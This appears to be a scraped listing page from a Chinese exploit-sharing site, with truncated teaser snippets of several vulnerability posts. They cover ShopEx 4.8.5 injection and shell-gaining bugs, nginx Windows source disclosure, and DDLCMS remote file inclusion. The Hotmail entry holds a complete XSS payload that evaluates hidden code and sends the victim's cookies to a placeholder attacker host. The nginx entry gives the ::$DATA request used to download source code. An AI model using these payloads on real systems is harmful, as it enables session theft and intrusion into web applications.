【Oday】shopex 注入 0day (4.8.5)

作者:俺是农村的 QQ:332876777 \core\include_v5\shopCore.php public function shopCore( ) {          parent::kernel( );          if ( isset( $_POST['spgdif'] ) )          {                  $this->spgdif( );  //进入函数  By:俺是农村的                  exit( );          }      ............................ } public function spgdif( ) {          include_once( CORE_DIR."/func_ext.php" );          if (

【Oday】hotmail xss 欺骗代码

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META content="text/html; charset=gb2312" http-equiv=Content-Type> <STYLE>.ExternalClass p {top:rgb('88',80,'180);top:rgb(') !important height:expression(  (window.rrr==123)?xxx=8:(eval(code.title)==20088) || (rrr=123));}</STYLE> <META name=GENERATOR content="MSHTML 8.00.6001.18372"> </HEAD> <BODY> <P>-</P> <IMG id=code title='document.location="http://www.xxxxx.com/hotmail.asp?uid=user@hotmail.com&cookie="+escape(document.cookie);' src="http://gfx1.hotmail.com/mail/w3/pr01/ltr/i_safe.gif" width=1 height=1> <div>?л!</div> </BODY> </HTML>

nginx Source Disclosure and DoS Vulnerabilities

Issue 1: (Remote Source Disclosure) - Description - nginx 0.8.36 is a multi platform HTTP server. This vulnerability exists in the latest Windows version of the application available. nginx on Windows is vulnerable to a remote source disclosure attack. - Technical Details - (Source Download) http://[ webserver IP][:port]index.html::$DATA Issue 2: (Remote DoS (w/ Memory Corruption)) - Description - nginx 0.8.36 (Windows) does not seem to handle encoded directory traversal attempts

Nginx Source Disclosure/Download Vulnerability

TITLE: NGINX [ENGINE X] SERVER <= 0.7.65 (STABLE)/0.8.39 (DEVELOPMENT) SOURCE CODE DISCLOSURE/DOWNLOAD VULNERABILITY TESTED OS: WINDOWS XP SP3/ WINDOWS 7 HOME PREMIUM SEVERITY: HIGH IMPACT: READ/DOWNLOAD SOURCE CODE OF WEB APP FILES DISCOVERED DATE: 2010-06-04 FIXED DATE: 2010-06-07 FIXED VERSIONS: NGINX/0.8.40 AND NGINX/0.7.66 DISCOVERED BY: JOSE A. VAZQUEZ ======ABOUT APPLICATION====== "nginx [engine x] is a HTTP and reverse proxy server, as well as a mail proxy server written by Igor

【Oday】shopex 4.8.5.45144 GetShell

by:俺是农村的 QQ:332876777 \core\include_v5\crontab.php zend加密后的,我只发布解密后的代码。 public function run( )                 {                                 $this->logFile = HOME_DIR."/logs/access.log.php";                                 $this->now = time( );                                 $this->viewStat( );                                 $messenger =& $this->loadModel( "system/messenger" );                                 $messenger->runQueue( );                 }

【Exp】DDLCMS 2.1(皮)远程文件包含漏洞

============================================================== DDLCMS v2.1 (skin) Remote File Inclusion Vulnerability ============================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0     _                   __           __       __                     1 1   /' \            __  /'__`\        /\ \__  /'__`\                   0 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \